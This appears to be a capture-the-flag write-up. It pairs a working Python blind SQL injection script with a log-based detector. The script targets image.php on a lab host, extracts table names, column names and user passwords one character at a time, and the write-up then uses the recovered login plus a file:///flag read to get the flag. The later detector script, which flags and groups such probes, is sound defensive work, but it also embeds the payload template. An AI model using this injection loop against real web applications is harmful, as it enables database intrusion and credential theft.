web3
image.php has a SQL injection vulnerability.
```
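import sys

import requests

session = requests.session()
hh = ''  # characters recovered so far
burp0_url = "http://eci-2zeab1jn4vnk23hzs0z3.cloudeci1.ichunqiu.com:80/image.php"

for i in range(1, 100):       # 1-based position in the target string
    for j in range(30, 129):  # candidate ASCII code
        if j == 128:
            # no candidate matched at this position: end of the string
            sys.exit(1)
        # Spaces are replaced with /**/ in every payload.
        # Only the last assignment takes effect; comment out the later stages to run an earlier one.
        # Stage 1: table names in the ctf schema
        params={'id':"2/(select/**/ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctf'),{},1))={})".replace(' ','/**/').format(i,j)}
        # Stage 2: column names of the users table
        params={'id':"2/(select/**/ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='users'),{},1))={})".replace(' ','/**/').format(i,j)}
        # Stage 3: the password column of users
        params={'id':"2/(select/**/ascii(substr((select group_concat(password)from users),{},1))={})".replace(' ','/**/').format(i,j)}
        r = session.get(burp0_url, params=params)
        a = len(r.text)
        if a > 1000:  # long response: the comparison was true
            hh += chr(j)
            print(hh)
            break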
```
Log in with the recovered password.
After logging in,
File:///flag returns the flag.
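The detection side of the extraction loop above, as an added example that is not part of the original writeup: it flags non-numeric `id` values sent to image.php and collapses each character-by-character request into one template so the loop shows up as a single repeated pattern per client. The combined log format, the IP addresses, the response sizes, the threshold and all function names are assumptions; the sample lines are constructed.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import urlsplit, parse_qs, quote

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*"')
COMMENT_RE = re.compile(r"/\*.*?\*/")
SIGNALS = {
    "comment_as_space": COMMENT_RE,
    "char_compare": re.compile(r"ascii\s*\(\s*substr", re.I),
    "schema_enum": re.compile(r"information_schema", re.I),
}

def inspect_line(line):
    """Return (client, template, signals) for a non-numeric image.php id, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, url = m.group(1), urlsplit(m.group(2))
    if not url.path.endswith("/image.php"):
        return None
    for value in parse_qs(url.query).get("id", []):
        if re.fullmatch(r"[0-9]+", value):
            continue  # the only shape a legitimate image id has
        # Strip inline comments and mask numbers so every step of a
        # character-by-character loop collapses into the same template.
        template = re.sub(r"\d+", "N", COMMENT_RE.sub(" ", value).lower())
        signals = sorted(n for n, rx in SIGNALS.items() if rx.search(value))
        return client, template, signals
    return None

def find_blind_extraction(lines, threshold=5):
    """Report (client, template) pairs repeated at least `threshold` times."""
    counts, seen = Counter(), defaultdict(set)
    for line in lines:
        hit = inspect_line(line)
        if hit:
            client, template, signals = hit
            counts[(client, template)] += 1
            seen[(client, template)].update(signals)
    return [{"client": c, "template": t, "count": n, "signals": sorted(seen[(c, t)])}
            for (c, t), n in counts.items() if n >= threshold]

def make_line(ip, id_value, size):  # constructed combined-log-format line
    return (f'{ip} - - [01/Jan/2024:10:00:00 +0000] '
            f'"GET /image.php?id={quote(id_value, safe="")} HTTP/1.1" 200 {size}')

PROBE = "2/(select/**/ascii(substr((select/**/group_concat(password)from/**/users),{},1))={})"
SAMPLE_LOG = [make_line("198.51.100.4", "2", 48211), make_line("198.51.100.4", "17", 39004)]
SAMPLE_LOG += [make_line("203.0.113.9", PROBE.format(pos, code), 512)
               for pos in (1, 2, 3) for code in (97, 98, 99)]
```
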